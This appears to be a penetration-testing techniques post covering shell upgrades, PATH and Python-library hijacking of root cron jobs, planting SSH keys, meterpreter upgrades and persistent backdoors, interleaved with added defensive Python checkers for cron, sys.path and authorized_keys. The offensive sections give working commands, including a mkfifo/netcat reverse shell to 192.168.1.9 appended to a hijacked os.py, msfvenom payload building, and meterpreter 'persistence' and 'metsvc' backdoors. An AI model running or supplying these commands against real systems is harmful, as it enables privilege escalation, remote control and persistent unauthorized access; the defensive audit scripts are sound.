This post is more of a collection of techniques that can be useful.
For a guide to pentesting each port, click here.
Having an interactive shell is important: the connection won't hang up when we press Ctrl + C (a plain reverse shell doesn't handle the SIGINT signal well), we can autocomplete commands and paths, STDERR is displayed, and we have command history…
To upgrade it:
```shell
# IN REMOTE COMPUTER
python -c 'import pty; pty.spawn("/bin/bash");'
# Or
python3 -c 'import pty; pty.spawn("/bin/bash");'
# Ctrl + Z   # This suspends the session so we can reconfigure our local terminal

# IN OUR COMPUTER
stty raw -echo   # This passes STDIN and STDOUT through raw to the other terminal
fg               # We recover the reverse shell session

# IN REMOTE COMPUTER
reset            # If it asks for the terminal type use: xterm-256color
export SHELL=bash
export TERM=xterm-256color
```
And that's how you get a proper TTY.
A way to bypass a restricted shell is:
```shell
ssh <user>@<IP> bash
```
Passing bash as the command to ssh gives us a 'reverse shell': bash is started directly instead of the user's restricted login shell.
Sometimes, when a file is executed as part of a routine (a cron job, a systemd unit, a daemon…), it is not invoked by its absolute path but by a relative one:
```shell
# Absolute Path
/bin/bash
# Relative Path
bash
```
Relative-path commands can be hijacked by modifying the PATH variable so that the OS searches our directory first for the bash command (PATH is read in order from left to right). This way we can make the routine execute our command instead of the original one.
```shell
# PATH example
/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/snap/bin
```
This can be done with:
For example, on a server where a cron job is run as root and calls fdisk by relative path, if you create a file called fdisk containing a reverse shell (it could be something else) in a directory searched earlier in PATH, it will connect back to you with root access, as the script is being run by root.
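Added here as a defensive check, not code from the original post: the script parses system-crontab style lines, reports the jobs whose command is resolved through PATH, and lists the PATH directories that a predicate (by default os.access for the current user) reports writable. The crontab text is a constructed sample.

```python
"""Flag cron jobs that run a command by relative path (added example, not from the post)."""
import os
import re
import shlex
# Constructed sample in system-crontab format (m h dom mon dow user command).
SAMPLE_CRONTAB = """\
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
*/5 * * * * root fdisk -l > /tmp/disks.txt
0 3 * * *   root /usr/bin/find /tmp -mtime +7 -delete
@reboot     root bash /opt/scripts/start.sh
"""

def parse_system_crontab(text):
    """Yield (user, command) per job line; skip blanks, comments and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        # @reboot-style lines carry one schedule field, normal lines five.
        parts = line.split(None, 2) if line.startswith("@") else line.split(None, 6)
        if len(parts) >= 3:
            yield parts[-2], parts[-1]

def relative_command(command):
    """Program name if the shell would resolve it through PATH (no slash), else None."""
    try:
        words = shlex.split(command)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        words = command.split()
    return words[0] if words and "/" not in words[0] else None

def find_relative_commands(text):
    """(user, program) pairs whose program is looked up via PATH."""
    pairs = [(user, relative_command(cmd)) for user, cmd in parse_system_crontab(text)]
    return [(user, prog) for user, prog in pairs if prog]

def cron_path(text):
    """PATH declared in the crontab (cron does not use the login PATH), or None."""
    m = re.search(r'^\s*PATH="?([^"\n]*)', text, re.MULTILINE)
    return m.group(1) if m else None

def writable_path_entries(path_value, writable=lambda d: os.access(d, os.W_OK)):
    """PATH directories, in lookup order, that the predicate reports as writable."""
    return [d for d in path_value.split(":") if d and writable(d)]

if __name__ == "__main__":
    for user, prog in find_relative_commands(SAMPLE_CRONTAB):
        print(f"{user} runs {prog!r} by relative path")
    path = cron_path(SAMPLE_CRONTAB) or os.environ.get("PATH", "")
    print("writable PATH dirs:", writable_path_entries(path))
```

Any writable directory listed before the one holding the real binary is the condition a reviewer wants to catch; feed it /etc/crontab or the files under /etc/cron.d to check a real host.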
This involves modifying or replacing a library that a Python script requires so that it executes our code.
Let’s say I have this script that is owned by another user:
```python
#!/usr/bin/python
import os
print("Hello my friend!")
```
If this script is run from a cronjob, we can trick it into executing our code as that other user.
Taking into account that this script is run by python and not python3, we need to search for
We can alter the behaviour of the script by:
- Modifying the os library: if we have write access to the file, we can simply append our code at the end.
- Replacing the os library: we may not have write access to the file but to the folder. In that case we create a test.py, put our code at the end, and then replace the library:
```shell
mv test.py os.py
```
The code we can put at the end of the os library to execute another command could be:
```python
import os
# HERE THE CODE
os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.9 4444 >/tmp/f")
```
Then, when the script is run by the cronjob, we get a reverse shell!
An example of privilege escalation with this method is the Friendzone HTB machine.
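As an added defensive check (not code from the original post), the script below walks an interpreter's sys.path in import order and reports where a module such as os could be modified or shadowed: a writable directory before the one providing the module (the replace case above) or a writable module file or directory at that point (the modify case). It assumes the interpreter name passed in (python3 by default) is on PATH; on Python 3.11 and later os itself is loaded from a frozen copy before sys.path is consulted, so treat the result as a filesystem-level check.

```python
"""Report sys.path directories that could shadow or alter a module (added example)."""
import os
import subprocess

def interpreter_sys_path(python="python3"):
    """Ask the named interpreter for its sys.path (python and python3 differ, as noted above)."""
    code = "import sys; print('\\n'.join(sys.path))"
    out = subprocess.run([python, "-c", code], capture_output=True, text=True, check=True)
    return out.stdout.splitlines()

def dir_writable(path):
    return os.access(path, os.W_OK)

def module_file_in(directory, module):
    return os.path.isfile(os.path.join(directory, module + ".py"))

def hijack_points(paths, module, writable=dir_writable, has_module=module_file_in, cwd=None):
    """Walk sys.path in import order and return (directory, reason) pairs.

    A writable directory before the one providing `module` could hold a fake
    <module>.py; at the providing directory a writable file means it can be
    modified and a writable directory means the file can be swapped (the two
    cases above). An empty sys.path entry stands for the current directory."""
    findings = []
    for entry in paths:
        directory = entry or cwd or os.getcwd()
        if has_module(directory, module):
            if writable(os.path.join(directory, module + ".py")):
                findings.append((directory, "module file is writable"))
            if writable(directory):
                findings.append((directory, "module directory is writable"))
            break  # later entries are never consulted for this module
        if writable(directory):
            findings.append((directory, "writable directory searched before the real module"))
    return findings

if __name__ == "__main__":
    for directory, why in hijack_points(interpreter_sys_path(), "os"):
        print(f"{directory}: {why}")
```

Run it as the user that owns the cron job to see what that user's import of os would actually pick up.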
If SSH is available we can copy our public key (usually ~/.ssh/id_rsa.pub) to the server, more specifically into ~/.ssh/authorized_keys; doing so will let us SSH in without having to input a password.
To generate the keys in case we don't have them, we run ssh-keygen and it creates them automatically.
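From the defender's side, the thing to watch for is exactly that extra line in authorized_keys. The following is an added example (not from the original post) that parses an authorized_keys file, including entries that carry options before the key type, validates that each key blob matches its declared type, computes the OpenSSH-style SHA256 fingerprint, and reports entries not on an allowlist; the sample entries are constructed with bogus key material.

```python
"""Audit an authorized_keys file against allowlisted fingerprints (added example)."""
import base64
import hashlib
import struct

KEY_TYPES = ("ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")

def fingerprint(blob):
    """OpenSSH-style SHA256 fingerprint of a decoded key blob (base64, no padding)."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")

def make_blob(key_type, key_bytes):
    """Minimal wire-format blob, string(type) || string(key), used to build the samples."""
    return (struct.pack(">I", len(key_type)) + key_type.encode()
            + struct.pack(">I", len(key_bytes)) + key_bytes)

# Constructed sample entries: bogus key material, valid structure.
ADMIN_KEY = base64.b64encode(make_blob("ssh-ed25519", b"\x01" * 32)).decode()
MONITOR_KEY = base64.b64encode(make_blob("ssh-ed25519", b"\x02" * 32)).decode()
SAMPLE_AUTHORIZED_KEYS = f"""\
ssh-ed25519 {ADMIN_KEY} admin@workstation
command="/usr/bin/uptime",no-pty ssh-ed25519 {MONITOR_KEY} monitor
"""

def parse_authorized_keys(text):
    """Yield (options, key_type, fingerprint, comment); options may precede the type."""
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        idx = next((i for i, f in enumerate(fields) if f in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(fields):
            continue  # unknown key type or no key data
        try:
            blob = base64.b64decode(fields[idx + 1], validate=True)
        except ValueError:
            continue  # not valid base64
        # The blob begins with a length-prefixed copy of the type; skip mismatches.
        if len(blob) < 4 or blob[4:4 + struct.unpack(">I", blob[:4])[0]] != fields[idx].encode():
            continue
        yield " ".join(fields[:idx]), fields[idx], fingerprint(blob), " ".join(fields[idx + 2:])

def unexpected_keys(text, allowed_fingerprints):
    """Entries whose fingerprint is not on the allowlist, for review or removal."""
    return [(key_type, fp, comment) for _, key_type, fp, comment in parse_authorized_keys(text)
            if fp not in allowed_fingerprints]
```

The fingerprints it prints match the `ssh-keygen -lf` output for the same file, so an allowlist can be built from known-good keys and diffed on a schedule.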
We can upgrade a reverse shell to a meterpreter by uploading an msfvenom meterpreter payload and running it:
```shell
msfvenom -p <PAYLOAD> LHOST=<IP> LPORT=<PORT> -f <FORMAT> > <FILE>.<EXTENSION>
```
A good reference for msfvenom usage is this page.
Then we can upload it via an upload page the machine may have, curl, wget, netcat, scp, ftp, powershell… It's up to you.
When we’ve uploaded it, it’s time to run it and listen on the port to get the meterpreter:
# ON MSFCONSOLE use exploit/multi/handler set LHOST <LISTENING IP> set LPORT <LISTENING PORT> set payload <PAYLOAD USED IN MSFVENOM> run
And that should get us the met. shell.
We can also upload another reverse shell, this time with a 'cmd' payload. When we get the connection with the cmd reverse shell:
```shell
# Putting the session in the background
background
# Upgrading cmd to meterpreter
sessions -u <ACTUAL CMD SESSION>
# After that it should upgrade and return to let us choose between cmd or meterpreter.
# So we list the sessions to avoid picking the wrong one.
sessions -l
# We select the one whose description says meterpreter
sessions -i <MET. SESSION>
```
And there we are again!
When we have a user and password, it's possible to get an ssh session and upload files when wget or curl (for example) are restricted, via a Metasploit module or even with
```shell
# Log in to msf
msfconsole
# Use the module
use auxiliary/scanner/ssh/ssh_login
# Set parameters
set rhosts <remote ip>
set username <user>
set password <pass>
# 💥
run
# After creating the session, upgrade it!
sessions -u <session>
```
A backdoor is a persistent remote connection: we can connect to the machine even after we disconnect or the PC reboots, because it will always be waiting for a connection or calling back to us. There are service backdoors, web shells…
- Tennc - Webshells
- xl7dev - Webshells
- Bartblaze - PHP
- Mattiasgeniar - PHP
- Meterpreter: on Windows we can migrate the meterpreter to another process and then make it persistent by installing a service:
```shell
# IN METERPRETER
ps                # We take the PID of explorer.exe (Windows)
migrate <PID>
run metsvc
```
Or we can run:
```shell
# IN METERPRETER
run persistence -A -L c:\\ -X -i SECS -p <OPEN PORT> -r <LHOST>   # -i SECS: checks the connection every SECS seconds
```
And now we have a service connecting back to us.